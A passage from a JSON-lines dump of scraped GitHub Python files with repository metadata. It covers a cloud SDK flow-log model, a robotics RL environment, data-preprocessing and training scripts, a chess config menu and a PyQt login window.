collectInterval=None, storageRegionId=None, storageType=None, storageId=None, createdTime=None):\n \"\"\"\n :param flowLogId: (Optional) 流日志ID\n :param flowLogName: (Optional) 流日志名称,只允许输入中文、数字、大小写字母、英文下划线“_”及中划线“-”,不允许为空且不超过32字符\n :param description: (Optional) 描述,允许输入UTF-8编码下的全部字符,不超过256字符\n :param flowLogType: (Optional) 流日志类型\nPORT:采集资源包括云主机、弹性网卡\n\n :param flowLogStatus: (Optional) 流日志的状态\nRUNNING:采集中\nSTOPPED:已停止采集\n\n :param collectResources: (Optional) 采集资源列表\n :param collectTrafficType: (Optional) 采集流量类型\nALL:记录指定资源的全部流量。\nACCEPT:记录指定资源被安全组、网络ACL均接受的流量。\nREJECT:记录指定资源被安全组或网络ACL拒绝的流量。\n\n :param collectInterval: (Optional) 流日志采集时间间隔。单位:分钟。取值:1、5、10\n :param storageRegionId: (Optional) 流日志的存储服务所在地域\n :param storageType: (Optional) 流日志的存储服务类型\nLOG:日志服务\n\n :param storageId: (Optional) 流日志数据存储服务ID\n :param createdTime: (Optional) 流日志创建时间\n \"\"\"\n\n self.flowLogId = flowLogId\n self.flowLogName = flowLogName\n self.description = description\n self.flowLogType = flowLogType\n self.flowLogStatus = flowLogStatus\n self.collectResources = collectResources\n self.collectTrafficType = collectTrafficType\n self.collectInterval = collectInterval\n self.storageRegionId = storageRegionId\n self.storageType = storageType\n self.storageId = storageId\n self.createdTime = createdTime\n","repo_name":"jdcloud-api/jdcloud-sdk-python","sub_path":"jdcloud_sdk/services/flowlog/models/FlowLog.py","file_name":"FlowLog.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"19036888760","text":"\"\"\"\n@brief Configuration script for the place task of the rail over \n the kidney.\n@author Claudia D'Ettorre (c.dettorre@ucl.ac.uk)\n@date 03 Sep 2020\n\"\"\"\n\nfrom gym import utils\nfrom dVRL_simulator.PsmEnv_Position_reachkid import PSMEnv_Position_reachkid\nimport numpy as np\n\n\nclass PSMReachKidneyEnv(PSMEnv_Position_reachkid):#, utils.EzPickle):\n def __init__(self, psm_num=1, reward_type='sparse', \n randomize_obj=True, randomize_ee=True,\n #randomize_grasp=False, \n randomize_kid = False, randomize_kid_or=False,\n randomize_target_point=True, # test\n action_type='continuous'):\n initial_pos_ee=np.array([0, 0, -0.07])\n initial_pos_k=np.array([0.05, 0.07, 0])\n #initial_pos_k=np.array([0.05, -0.05, 0])\n\n super(PSMReachKidneyEnv, self).__init__(\n psm_num=psm_num, n_substeps=1, \n block_gripper=True,\n has_object=True, \n target_in_the_air=True, \n height_offset=0.0001,\n target_offset=[0,0,0.038], \n obj_range=0.025, \n target_range=0.075,\n distance_threshold=0.003, \n initial_pos=initial_pos_ee, \n initial_pos_k=initial_pos_k, \n reward_type=reward_type,\n dynamics_enabled=False, \n two_dimension_only=False, \n randomize_initial_pos_ee=randomize_ee,\n randomize_initial_pos_obj=randomize_obj, \n\t\t\trandomize_initial_pos_kidney=randomize_kid, \n randomize_initial_or_kidney=randomize_kid_or,\n # To debug\n randomize_target_point=randomize_target_point, # test\n #randomize_grasping_site=randomize_grasp, # test\n\t\t\t#randomize_initial_or_obj=False, # test \n action_type=action_type,\n docker_container = self.__class__.__name__.lower())\n\n utils.EzPickle.__init__(self)\n","repo_name":"Cladett/rlman","sub_path":"dVRL_simulator/environments/reachkidney_backup.py","file_name":"reachkidney_backup.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"35952305528","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\n\n\nclass DataPreprocessing:\n def __init__(self):\n self.scaler_input = MinMaxScaler()\n self.scaler_output = MinMaxScaler()\n self.input_steps = 18\n self.output_steps = 6\n self.input_steps_categoria = 90\n self.output_steps_categoria = 30\n self.fitxerModel = os.path.join('model', 'model.h5')\n self.hyperparameter_ranges = {\n \"n_layers\": [1, 30],\n \"num_units_layer\": [16, 200],\n \"lr\": [1e-4, 1e-2],\n \"n_epochs\": [100, 300],\n \"batch_size\": [16, 64]\n }\n\n @staticmethod\n def set_data():\n archivo_entrada = os.path.join(\".\", \"..\", \"dades\", \"Dades_Per_entrenar.csv\")\n pre_process = DataPreprocessing()\n data = pre_process.read_data(archivo_entrada)\n return data\n\n def read_data(self, nomFitxer=None):\n data = pd.read_csv(nomFitxer, sep=\";\", parse_dates=[0])\n return data\n\n def preprocess_data(self, data_prediccion=None):\n data_procesada = data_prediccion.copy()\n data_procesada[data_procesada.columns[2:]] = data_procesada.iloc[:, 2:].astype(float)\n data_procesada = pd.get_dummies(data_procesada, columns=['Gran Grup'], prefix='Gran Grup')\n data_procesada.iloc[:, 4:-5] = self.scaler_input.fit_transform(data_procesada.iloc[:, 4:-5])\n data_procesada.iloc[:, 1:4] = self.scaler_output.fit_transform(data_procesada.iloc[:, 1:4])\n data_procesada = data_procesada.drop(data_procesada.columns[0], axis=1)\n data_procesada = data_procesada.dropna()\n return data_procesada\n\n def split_data(self, data_procesada):\n train_size = int(len(data_procesada) * 0.7)\n train_data = data_procesada[:train_size]\n test_data = data_procesada[train_size:]\n x_train, y_train = self.create_sequences(train_data)\n x_test, y_test = self.create_sequences(test_data)\n return x_train, y_train, x_test, y_test\n\n def create_sequences(self, data):\n X, y = [], []\n for i in range(len(data) - self.input_steps_categoria - self.output_steps_categoria + 1):\n input_data = data.iloc[i:i + self.input_steps_categoria, [0, *range(4, data.shape[1])]].values\n output_data = data.iloc[\n i + self.input_steps_categoria:i + self.input_steps_categoria + self.output_steps_categoria,\n 0:3].values\n self.output_column_names = data.columns[3:6].tolist()\n X.append(input_data)\n y.append(output_data)\n return np.array(X), np.array(y)\n\n def create_sequences_for_prediction(self, data):\n \"\"\"\n Crea secuencias de datos de entrada a partir del conjunto de datos procesado para realizar predicciones.\n \"\"\"\n if len(data) < self.input_steps_categoria:\n raise ValueError(\n f\"Se requieren al menos {self.input_steps_categoria} registros en los datos para la predicción.\")\n input_data = data.iloc[-self.input_steps_categoria:, [0, *range(4, data.shape[1])]].values\n return np.array([input_data])\n\n","repo_name":"u1050411/RNN_LLE2","sub_path":"src/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8604899354","text":"from kivy.utils import platform\r\nif platform == 'android':\r\n from jnius import autoclass\r\n\r\n # Importa as classes necessárias do Android\r\n MediaPlayer2 = autoclass('android.media.MediaPlayer')\r\n Uri2 = autoclass('android.net.Uri')\r\n PythonActivity2 = autoclass('org.kivy.android.PythonActivity')\r\n\r\n # Cria um novo objeto MediaPlayer\r\n player2 = MediaPlayer2()\r\nelse:\r\n MediaPlayer2 = None\r\n Uri2 = None\r\n PythonActivity2 = None\r\n player2 = None","repo_name":"issacwillianDEV/spotfree","sub_path":"media_player.py","file_name":"media_player.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71276764920","text":"import datetime\nimport os\nimport json\n\nfrom typing import List\n\nclass DataTypeNotSuppoetedForIngestionException(Exception):\n def __init__(self, data):\n self.data = data\n self.message = f\"Data Type {type(data)} is not supported for ingestion\"\n super().__init__(self.message)\n\n\nclass DataWriter():\n def __init__(self, coin: str, api: str) -> None:\n self.coin = coin\n self.api = api\n self.filename = f\"{self.api}/{self.coin}/{datetime.datetime.now()}.json\"\n \n def _write_row(self, row: str) -> None:\n os.makedirs(os.path.dirname(self.filename), exist_ok = True)\n # insere os dados no modo append\n with open(self.filename, \"a\") as f:\n f.write(row)\n \n def write(self, data: [List, dict]):\n # isinstance verifica a classe do tipo data\n if isinstance(data, dict):\n self._write_row(json.dumps(data) + \"\\n\")\n elif isinstance(data, List):\n for element in data:\n self.write(element)\n else:\n raise DataTypeNotSuppoetedForIngestionException(data)\n","repo_name":"danielvolponi/bootcamp_how_engenharia_dados","sub_path":"05-capturando-dados-api/mercado_bitcoin/writers.py","file_name":"writers.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11750472370","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 6 19:21:18 2019\r\n\r\n@author: pepe8\r\n\"\"\"\r\nimport pandas as pd\r\nimport random \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nalunos = ['joão', 'gabriel', 'gustavo']\r\n\r\nsorteio = random.choices(alunos, k=1)\r\nprint(alunos)\r\n\r\n## distribuição aleatoria triangular\r\nstart_time = datetime.now()\r\nprint('inicio: ', start_time)\r\n\r\ndistribuicao = np.random.triangular(3.20,4.15,5,500000)\r\n# distribuição uniforme \r\n\r\n#distribuicao2 = np.random.uniform(3.20,5,1000000)\r\n\r\n#distribuição normal\r\n#distribuicao3 = np.random.normal(4.15,2,1000000)\r\n\r\n#print('media é de: {:.4f}'.format(np.mean(distribuicao)))\r\n#print('media é de: {:.4f}'.format(np.mean(distribuicao2)))\r\n#print('media é de: {:.4f}'.format(np.mean(distribuicao3)))\r\nplt.plot(distribuicao, bins = 100)\r\nplt.show()\r\n\r\ntermino = datetime.now()\r\n\r\nprint('tempo ', termino - start_time)","repo_name":"ppdejah/Tomada_dec_Financeira","sub_path":"Abrindo arquivo excel.py","file_name":"Abrindo arquivo excel.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3324927093","text":"#primer ajuste\n# Nota no funciona del todo bien a veces no se ejecuta a la primera y nunca logre que metiera los procesos de corrido (no supe como manipular los índices del ciclo for)\nimport random\n\n\nmemoria = []\n\ndef main():\n\n\tent=input(\"Asignar (0) o liberar (1): \")\n\n\ndef menu(opcion):\n\tif opcion == '0':\n\t\tAsignar()\n\telif opcion == '1':\n\t\tBorrar()\n\telse:\n\t\tprint(\"ingrese una opcion valida\")\n\t\n\ndef Consecutivos():# Calcula los espacios consecutivos vacíos en el arreglo\n\tglobal memoria\n\tconsecutivo=0\n\tanterior=0\n\tfor i in memoria:\n\t\tif i == '-':\n\t\t\tconsecutivo=consecutivo+1\n\t\t\tif anterior libre:\n\t\tprint (\"Espacio insuficiente elimine un proceso para continuar\")\n\telif Consecutivos() < tam:\n\t\tprint(\"compactacion requerida\")\n\t\tCompactacion()\n\t\tReAsignando(pro, tam)\n\n\telse:\n\t\tReAsignando(pro, tam)\n\t\t\ndef ReAsignando(A, B):# B es tamano del proceso A nombre del proceso\n\tglobal memoria\n\tcont=0\n\tcont2=B\n\tfor i in (memoria):\n\t\t\tif i == '-' and cont2 > 0 :\n\t\t\t\tposi=Disponible(B)\n\t\t\t\tmemoria.remove('-')\n\t\t\t\tmemoria.insert(posi, A)\n\t\t\t\tcont=cont+1\n\t\t\t\tcont2=cont2-1\n\n\tMuestra()\n\ndef Disponible(C): # intenta encontrar un espacio vacío lo suficientemente mente grande para alojar el proceso \n\tglobal memoria\n\tconsecutivo=0\n\tanterior=0\n\tind=0\n\tfor i in memoria:\n\t\tif i == '-':\n\t\t\tconsecutivo=consecutivo+1\n\t\t\tif anterior 0:\n element.text = str(int(element.text) - 1)\n element.redraw()\n\n def select_timer(it, option):\n self.timer = option\n self.update_labels_and_fields()\n\n def select_fiftymove(it, option):\n self.fifty_move = option\n\n def select_jit_draw(it, option):\n self.current_jit_draw = option\n\n def select_timeout(it, option):\n self.timeout = option\n\n def motion(it, collides, color):\n if collides:\n it.color = self.button_hover\n else:\n it.color = color()\n it.redraw()\n\n self.back_click = back_click\n self.quit_click = quit_click\n self.minutes_plus_click = partial(plus, element=lambda: self.minutes)\n self.moves_plus_click = partial(plus, element=lambda: self.moves)\n self.bonus_plus_click = partial(plus, element=lambda: self.bonus)\n self.minutes_minus_click = partial(minus, element=lambda: self.minutes)\n self.moves_minus_click = partial(minus, element=lambda: self.moves)\n self.bonus_minus_click = partial(minus, element=lambda: self.bonus)\n self.select_timer = select_timer\n self.select_fiftymove = select_fiftymove\n self.select_jit_draw = select_jit_draw\n self.select_timeout = select_timeout\n self.motion = partial(motion, color=lambda: self.button_color)\n self.motion_options = partial(motion, color=lambda: self.value_color)\n\n def update_labels_and_fields(self):\n self.show_bonus = False\n self.show_moves = False\n if self.timer == TIMER_OPTIONS[\"moves_per_minutes\"]:\n self.show_moves = True\n elif self.timer == TIMER_OPTIONS[\"fischer_game\"]:\n self.show_bonus = True\n\n def save(self):\n data = {\n 'timer': self.timer,\n 'minutes': int(self.minutes.value),\n 'moves': int(self.moves.value),\n 'bonus': int(self.bonus.value),\n 'fifty_move': self.fifty_move,\n 'jit_draw': self.current_jit_draw,\n 'timeout': self.timeout\n }\n\n try:\n os.makedirs(os.path.abspath(self.data_dir))\n except:\n pass\n\n with open(os.path.abspath(os.path.join(self.data_dir, 'config.json')),\n 'w') as f:\n json.dump(data, f)\n\n def draw(self, delta_time):\n \"\"\"Draws ConfigMenu\"\"\"\n self.main_div.draw(self.game.screen)\n\n def event(self, delta_time, event):\n \"\"\"Checks for mouse hover and mouse click\"\"\"\n if event.type == pygame.MOUSEMOTION:\n self.main_div.motion(event.pos)\n elif event.type == pygame.MOUSEBUTTONUP:\n self.main_div.click(event.pos)\n\n def resize(self):\n ConfigMenuInterface.resize(self)\n","repo_name":"GRUPO-ES2-GJLRT/XADREZ_ES2","sub_path":"src/scenes/config_menu.py","file_name":"config_menu.py","file_ext":"py","file_size_in_byte":4411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3168896241","text":"import rospy\nfrom sensor_msgs.msg import JointState\n\n## @brief This provides an interface to the \"fake_controller\" aspects of\n## the MoveIt demo.launch files.\nclass FakeGroupInterface(object):\n \n ## @brief Signature intended to match real interface, params not used\n def __init__(self, group, frame, listener=None, plan_only=False):\n self.pub = rospy.Publisher(\"/move_group/fake_controller_joint_states\",\n JointState,\n queue_size=10)\n\n ## @brief This is modeled such that we can use the fake interface as a\n ## drop in replacement for the real interface.\n def moveToJointPosition(self, joints, positions, **kwargs):\n msg = JointState()\n msg.header.stamp = rospy.Time.now()\n msg.name = joints\n msg.position = positions\n self.pub.publish(msg)\n","repo_name":"mikeferguson/moveit_python","sub_path":"src/moveit_python/fake_group_interface.py","file_name":"fake_group_interface.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"40"} +{"seq_id":"6540047219","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom 主界面 import *\nfrom 信息隐藏工具 import *\nfrom 隐藏加密 import *\nfrom 隐藏解密 import *\nfrom 视频处理 import *\nfrom PyQt5.QtCore import pyqtSlot, pyqtSignal, QObject, QThread\nfrom PIL import Image\n\n\"\"\"\n取得一个 PIL 图像并且更改所有值为偶数(使最低有效位为 0)\n\"\"\"\n\n\n\n################################################\n#######创建主窗口\n################################################\nclass MainWindow(QMainWindow, Ui_MainWindow,QWidget):\n windowList = []\n sig_1 = pyqtSignal()\n def __init__(self, parent=None,*args,**kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n self.setupUi(self)\n self.actionabout.triggered.connect(self.on_printAction1_triggered)\n # 创建动作 退出\n self.actionexit.triggered.connect(self.on_printAction2_triggered)\n\n\n # 动作一:注销\n def on_printAction1_triggered(self):\n self.close()\n dialog = Dialog(mode=1)\n if dialog.exec_()==QDialog.Accepted:\n the_window = MainWindow()\n self.windowList.append(the_window) #这句一定要写,不然无法重新登录\n the_window.show()\n\n # 动作二:退出\n def on_printAction2_triggered(self):\n self.close()\n\n # 关闭界面触发事件\n def closeEvent(self, event):\n print(999999999)\n pass\n\n################################################\n#######对话框\n################################################\n\nclass Dialog(QDialog,Ui_Dialog):\n\n def __init__(self, parent=None,mode=0,*args,**kwargs):\n\n super().__init__(*args, **kwargs)\n self.mode = mode\n ###### 绑定按钮事件\n ####初始化登录信息\n\n self.setupUi(self)\n ###### 绑定按钮事件\n self.pushButton.clicked.connect(self.on_pushButton_clicked)\n self.pushButton_2.clicked.connect(QCoreApplication.instance().quit)\n\n\n ####自动登录\n # 自动登录\n def goto_autologin(self):\n if self.checkBox_autologin.isChecked()==True and self.mode == 0 :\n self.on_pushButton_clicked()\n def on_pushButton_clicked(self):\n # 账号判断\n if self.lineEdit.text() == \"\":\n return\n\n # 密码判断\n if self.lineEdit_2.text() == \"\":\n return\n\n ####### 保存登录信息\n\n # 通过验证,关闭对话框并返回1\n self.accept()\n\n # 保存登录信息\n\n # 初始化登录信息\n\n\n################################################\n#######程序入门\n################################################\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n dialog = Dialog(mode=0)\n if dialog.exec_()==QDialog.Accepted:\n the_window = MainWindow()\n child1 = QWidget()\n child2 = QMainWindow()\n child3 = QWidget()\n child1_ui = Ui_Form1()\n child1_ui.setupUi(child1)\n child2_ui = Ui_Form2()\n child2_ui.setupUi(child2)\n child3_ui = Ui_Form3()\n child3_ui.setupUi(child3)\n # 按钮绑定事件\n btn1 = the_window.pushButton\n btn1.clicked.connect(child1.show)\n btn2 = the_window.pushButton_2\n btn2.clicked.connect(child2.show)\n btn3 = the_window.pushButton_3\n btn3.clicked.connect(child3.show)\n\n the_window.show()\n sys.exit(app.exec_())\n\n\n","repo_name":"invierno123/steganography","sub_path":"登录界面.py","file_name":"登录界面.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27643543820","text":"from torchvision.datasets import ImageFolder\nfrom torch.utils.data import WeightedRandomSampler, DataLoader\nimport torch.cuda\nimport torch.optim as optim\nfrom collections import Counter\nfrom math import ceil\nimport matplotlib.pyplot as plt\nimport time\n\nfrom neuralnet import *\nfrom datasets import *\nfrom train import *\nfrom dynamicsampler import *\nfrom unlabeledaccuracy import *\nfrom graphs import *\n\n# Key neural network hyperparameters (the classics)\nvalidation_size = 0.3 # Set to 0 < x < 1 to use x% of images from each class for the validation set, or x > 1 to use constant x images from each class for the validation set.\ndataset_expansion_multiplier = 0.1 # Sets the minimum number of images in the training set from each class to x% of the largest class. If a class has fewer images than the min, augmented duplicates are created.\nmax_images_trained = 10000000 # If after an epoch, the number of images that were trained on exceeds this number, the program stops training.\nbatch_size = 256 # Mini batch size \nlearning_rate = 0.03 # Initial learning rate\nlearning_rate_decay = 0.95 # Set to 0 < x <= 1 to have the learning rate decay (1 - x)% after each epoch (setting it to 1 will cause the learning rate to remain constant).\nmomentum = 0.9 # Affects how much results from previous gradient descents contribute to the current gradient descent.\n\n# Neural network dimensions\nconvolution_layer_width = 256 # Width of the convolution layers\nkernel1_size = 5 # Kernel size of first convolution layer\nkernel2_size = 5 # Kernel size of second convolution layer\nlinear_layer_width = 2048 # Width of linear layers\noutput_layer_width = 10 # Width of output layer (number of classes in dataset)\n\n# Dynamic sampling parameters\ndynamic_weights_power = 2 # Defines how much each class's f score affects its weights in the next epoch. Set to x >= 0, where x = 1 makes the relationship linear (x = 0 makes the weights static).\ndynamic_weights_dampening_min = 0 # The smallest amount of dampening that the dynamic sampler will apply\ndynamic_weights_dampening_max = 1 # The largest amount of dampening that the dynamic sampler will apply (this value is reaached asymptotically)\ndynamic_weights_dampening_initial = 0.1 # Initial amount of dampening\ndynamic_weights_dampening_forward_step_size = 0.1 # How much the dampening increases each time the threshold is reached\ndynamic_weights_dampening_reverse_step_size = 0.04 # How much the dampening decays each time the threshold is not reached\ndynamic_weights_dampening_step_threshold = 0.9 # If the weight of the largest sampled class falls below this threshold in one epoch, the dampening factor will increase by one step forward.\n\n# Unlabeled dataset simulation parameters\nrun_unlabeled_set_simulation = False # Before training the NN, runs the simulation. Set to 'False' if you are using a large validation set (more than one or two thousand).\nprint_unlabeled_set_simulation_results = False # Print all accuracies and confidence intervals obtained in simulation.\nerror_estimate_sample_size = 5000 # Number of random simulations that should be performed\nconfidence_interval = 0.95 # Used to showcase expected lower and upper bounds of model simulation\nprobability_weights_offset_min = 1000 # Lower bound for uniform portion of RNG\nprobability_weights_offset_max = 20000 # Upper bound for uniform portion of RNG\nprobability_weights_correlation = 0.12 # Governs how much the weights of indices moved from affect the weights of indices moved to (how much precision and recall are correlated)\nprobability_weights_base_min = 2 # Lower bound of base used for nonuniform portion of RNG\nprobability_weights_base_max = 2 # Upper bound (inclusive) of base used for nonuniform portion of RNG\nprobability_weights_power_min = 0 # Lower bound of exponent used for nonuniform portion of RNG\nprobability_weights_power_max = 19 # Upper bound (inclusive) of exponent used for nonuniform portion of RNG\n\nimage_analysis = True # Set to True to display ten different correctly and incorrectly predicted images as well as the NN's prediction probabilities for each of those images (after the last epoch)\nsave_images_to_folder = False # Set to True to save the images in the training, validation, and augmented validation sets to a folder (this will take a looong time, use a smaller set to test transformations)\n\n# Folder from which to get the images\nraw_image_folder_name = 'C:/Users/dwypy/source/repos/EARIN_Project/archive/train/EO'\n\n# Folders in which to save resulting training, validation, and augmented validation sets.\ntrain_image_folder_name = 'C:/Users/dwypy/source/repos/EARIN_Project/saved_images/temp_train'\nval_image_folder_name = 'C:/Users/dwypy/source/repos/EARIN_Project/saved_images/temp_val'\naugmented_val_image_folder_name = 'C:/Users/dwypy/source/repos/EARIN_Project/saved_images/temp_augmented_val'\n\n\n# Load the dataset\ndataset = ImageFolder(raw_image_folder_name)\n\n# Get the class labels\nclass_labels = dataset.classes\n\n# Get the targets of each image in the dataset\ntargets = dataset.targets\n\n# Get the indices of images in each class\nclass_indices = {class_label: np.where(np.array(targets) == i)[0] for i, class_label in enumerate(class_labels)}\n\n# Count the number of images in each class\ntotal_class_counts = {}\n\n# Gets the number of images in the training set, validation set, and combined set.\ntotal_class_counts, train_class_counts, val_class_counts = get_class_counts(dataset, validation_size, class_labels)\n\n# Creates the training, validation, and augmented validation sets.\ntrain_dataset, val_dataset, augmented_val_dataset = get_subsets(dataset, class_indices, val_class_counts, targets)\n\n# Find the size of the largest class\nmaximum_class_size = int(dataset_expansion_multiplier * max(train_class_counts.values()))\n\n# Calculate the number of augmentations needed for each class\naugmentations_per_class = {class_label: get_num_of_augmentations(maximum_class_size, count) for class_label, count in train_class_counts.items()}\n\n# Apply transformations to the data sets\ntrain_dataset = CustomDataset(train_dataset, train_class_counts, transform=transform_train, augmentations_per_class=augmentations_per_class)\nval_dataset = CustomDataset(val_dataset, val_class_counts, transform=transform_val)\naugmented_val_dataset = CustomDataset(augmented_val_dataset, val_class_counts, transform=transform_train)\n\n# Save the images from the training and validation sets \nif save_images_to_folder:\n save_images(train_dataset, train_image_folder_name)\n save_images(val_dataset, val_image_folder_name)\n save_images(augmented_val_dataset, augmented_val_image_folder_name)\n\n\n# Calculate the number of images in each class of the training dataset after it has been augmented\nnew_class_counts = {class_label: count + augmentations_per_class.get(class_label, 0) for class_label, count \n in train_class_counts.items()}\n\ntrain_labels = [train_dataset.dataset.targets[i] for i in train_dataset.indices]\n\n\ndyna_sampler = DynamicSampler(new_class_counts, train_labels, dynamic_weights_power, dynamic_weights_dampening_min, \n dynamic_weights_dampening_max, dynamic_weights_dampening_initial, dynamic_weights_dampening_forward_step_size, \n dynamic_weights_dampening_reverse_step_size, dynamic_weights_dampening_step_threshold)\n\n\n# Print relevent info about current test\nprint_test_info(batch_size, learning_rate, learning_rate_decay, momentum, validation_size, dataset_expansion_multiplier, max_images_trained, dyna_sampler)\n\n\n# Runs simulation to estimate accuracy and confidence interval of an unlabeled dataset. The accuracies obtained in the simulation are \nif run_unlabeled_set_simulation:\n sim_probabilities = SimulatedWeights(output_layer_width, error_estimate_sample_size, probability_weights_correlation, probability_weights_offset_min, \n probability_weights_offset_max, probability_weights_base_min, probability_weights_base_max, \n probability_weights_power_min, probability_weights_power_max)\n\n simulated_unlabeled_mean, simulated_unlabeled_confidence_interval = get_simulated_unlabeled_set_data(sim_probabilities, val_class_counts, confidence_interval, \n print_unlabeled_set_simulation_results)\n\n# Define data loaders\ntrain_loader = DataLoader(train_dataset, batch_size=batch_size, sampler=dyna_sampler.weighted_random_sampler)\nval_loader = DataLoader(val_dataset, batch_size=batch_size)\naugmented_val_loader = DataLoader(augmented_val_dataset, batch_size=batch_size)\n\n# Instantiate the network\nnet = Net(convolution_layer_width=convolution_layer_width, kernel1_size=kernel1_size, kernel2_size=kernel2_size, \n linear_layer_width=linear_layer_width, output_layer_width=output_layer_width)\n\n# Define the loss function and optimizer\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=learning_rate, momentum=momentum)\nscheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma=learning_rate_decay)\n\n# Print relevent info about neural network used\nprint(f\"\\nStructure of neural network:\\n\\n {net} \\n\")\n\n# Move the network and loss function to the GPU if available\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nnet.to(device)\ncriterion.to(device)\n\nimages_trained = 0\nepoch = 0\nstep = 0\nimage_analysis_final = False\n\n# Lists to store accuracy and loss values\ntrain_acc_values = []\nval_acc_values = []\naugmented_val_acc_values = []\nloss_values = []\nsimulated_model_accuracy = []\nsimulated_model_CI_lo = []\nsimulated_model_CI_hi = []\nsimulated_model_MSE = []\naug_simulated_model_accuracy = []\naug_simulated_model_CI_lo = []\naug_simulated_model_CI_hi = []\naug_simulated_model_MSE = []\n\nstart_time = time.time()\n\n# loop over the dataset multiple times\nwhile images_trained < max_images_trained:\n print(f\"\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\")\n print('Epoch %d\\n\\nDampening: %.3f' % ((epoch + 1), dyna_sampler.current_dampening), ' LR: ', scheduler.get_last_lr())\n\n # Trains the neural network over one epoch\n loss_values, train_acc_values, all_labels_train, all_preds_train, total_train = train_neural_network(train_loader, epoch, net, device, optimizer, criterion, \n scheduler, loss_values, train_acc_values)\n \n # Decay Learning Rate\n scheduler.step()\n\n # Only perform image analysis after last epoch\n if image_analysis and (images_trained + total_train) >= max_images_trained:\n image_analysis_final = True\n\n # Run validation sets through neural network after each epoch\n with torch.no_grad():\n val_acc, total_displacement = check_validation_dataset(val_loader, net, device, image_analysis=image_analysis_final)\n val_acc_values.append(val_acc)\n\n if run_unlabeled_set_simulation:\n simulated_model_accuracy.append(simulated_unlabeled_mean[total_displacement])\n simulated_model_CI_lo.append(simulated_unlabeled_confidence_interval[total_displacement][0])\n simulated_model_CI_hi.append(simulated_unlabeled_confidence_interval[total_displacement][1])\n simulated_model_MSE.append(get_mean_squared_error(simulated_unlabeled_mean[total_displacement], val_acc))\n\n print_simulation_metrics(simulated_unlabeled_mean[total_displacement], simulated_unlabeled_confidence_interval[total_displacement], \n confidence_interval, simulated_model_MSE, epoch)\n\n augmented_val_acc, total_displacement = check_validation_dataset(augmented_val_loader, net, device, val_name=\"Augmented validation set\", image_analysis=image_analysis_final)\n augmented_val_acc_values.append(augmented_val_acc)\n \n if run_unlabeled_set_simulation:\n aug_simulated_model_accuracy.append(simulated_unlabeled_mean[total_displacement])\n aug_simulated_model_CI_lo.append(simulated_unlabeled_confidence_interval[total_displacement][0])\n aug_simulated_model_CI_hi.append(simulated_unlabeled_confidence_interval[total_displacement][1])\n aug_simulated_model_MSE.append(get_mean_squared_error(simulated_unlabeled_mean[total_displacement], augmented_val_acc))\n\n print_simulation_metrics(simulated_unlabeled_mean[total_displacement], simulated_unlabeled_confidence_interval[total_displacement], \n confidence_interval, aug_simulated_model_MSE, epoch, val_name=\"Augmented validation set\")\n\n # Resamples the training set based on the performance of each class after each epoch\n dyna_sampler = dynamic_sampling(dyna_sampler, all_labels_train, all_preds_train)\n\n # Updates train_loader after resampling\n train_loader = DataLoader(train_dataset, batch_size=batch_size, sampler=dyna_sampler.weighted_random_sampler)\n \n images_trained += total_train\n epoch += 1\n\n\nprint('Finished Training')\n\nend_time = time.time()\ntotal_time = end_time - start_time\nprint('Total computation time: %.3f seconds' % total_time)\n\n# Calculate the number of mini-batches per epoch\nbatches_per_epoch = len(train_loader)\n\n# Plots the accuracy of the training, validation, and augmented validation sets as well as the loss values for each epoch.\ncreate_primary_plots(epoch, batches_per_epoch, loss_values, train_acc_values, val_acc_values, augmented_val_acc_values)\n\n# Plots the predicted accuracy (from the simulated unlabeled model) of validation and augmented validation sets after each epoch, and compares them to the actual accuracies.\nif run_unlabeled_set_simulation:\n create_unlabeled_set_simulation_plots(epoch, val_acc_values, augmented_val_acc_values, simulated_model_accuracy, simulated_model_CI_lo, \n simulated_model_CI_hi, simulated_model_MSE, aug_simulated_model_accuracy, aug_simulated_model_CI_lo, \n aug_simulated_model_CI_hi, aug_simulated_model_MSE)\n\nplt.tight_layout()\nplt.show()","repo_name":"goku206125/EARIN--Vehicle-Classification-from-Aerial-view-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12537897326","text":"# import cac model hoi quy\r\nfrom sklearn.linear_model import LinearRegression\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nimport pandas as pd \r\nfrom sklearn.metrics import mean_absolute_error, mean_absolute_percentage_error\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nfrom 